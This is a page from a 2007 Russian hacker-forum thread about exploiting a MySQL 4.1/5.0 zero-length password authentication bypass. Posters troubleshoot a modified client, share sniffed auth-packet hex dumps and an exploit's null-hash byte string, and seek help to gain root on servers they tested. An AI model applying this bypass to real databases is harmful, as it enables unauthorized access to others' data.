HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
Перезагрузить страницу MySQL 4.1/5.0 zero-length password auth. bypass - modified MySQL client
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 15.08.2007, 16:00
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию
Цитата:
дело в том что через стандартные mysql клиенты я не могу заместо паса нулевое значение подставить... а через сокет как в скрипте - я не знаю как сделать..
Дык ettee выложил уже модифицированный клиент MySQL, посмотри чуть выше сплоита!
 
Ответить с цитированием

  #12  
Старый 15.08.2007, 16:26
j0ze
Новичок
Регистрация: 06.10.2006
Сообщений: 11
С нами: 10313022

Репутация: 5
По умолчанию
только он не пашет почемуто.. затестил на двух хостах с mysql версии 4.1.20

сам эксп дает добро "Received OK reply, authentication successful!!" а если через модифицированый клиент то

C:\>mysql.exe -uroot -ptrash
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: Y
ES)

и вообще странно.. если тестить через скрипт отснифаный пакет авторизации такой

Код:
0x0000   3A 00 00 01 85 A2 00 00-00 00 00 01 08 00 00 00   :...…¢..........
0x0010   00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
0x0020   00 00 00 00 72 6F 6F 74-00 14 00 00 00 00 00 00   ....root........
0x0030   00 00 00 00 00 00 00 00-00 00 00 00 00 00         ..............
т.е в конце одни нулевые байты. так и должно быть т.к это все нулёный хеш

"\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\ x00". # username and pword hash length + NULL hash
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"; # continue NULL hash

а когда логаешься через этот модифицированый клиент вот что получается

Код:
0x0000   3A 00 00 01 85 A6 03 00-00 00 00 01 08 00 00 00   :...…¦..........
0x0010   00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
0x0020   00 00 00 00 72 6F 6F 74-00 14 00 00 00 00 00 00   ....root........
0x0030   80 0F A2 00 9C FD 12 00-38 24 44 00 AC FD         ?.¢.œý..8$D.¬ý
у кого-нибудь вообще получалось этим клиентом порутать mysql?
Последний раз редактировалось j0ze; 15.08.2007 в 16:30..
 
Ответить с цитированием

  #13  
Старый 15.08.2007, 16:52
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию
Получалось.
 
Ответить с цитированием

  #14  
Старый 15.08.2007, 17:51
j0ze
Новичок
Регистрация: 06.10.2006
Сообщений: 11
С нами: 10313022

Репутация: 5
По умолчанию
в этом клиенте чето не так.. потому что в случае правильной авторизации mysql отвечает это

Код:
0x0000   01 00 00 02 FE                                    ....þ
и от тестового скрипта ответ такойже.. тобишь положительный. это значит что все 2 хоста на которых я тестил эксп уязвимы а этот модифированый клиент не пашет....

скорей всего проблема в том что

0x0030 80 0F A2 00 9C FD 12 00-38 24 44 00 AC FD ------- нада заменить на
0x0030 00 00 00 00 00 00 00 00-00 00 00 00 00 00

тока вот как это сделать хз.. есть спецы по этой части?
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Качаем с рапиды и меги нахаляву gemaglabin Болталка 38 07.12.2006 03:04



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.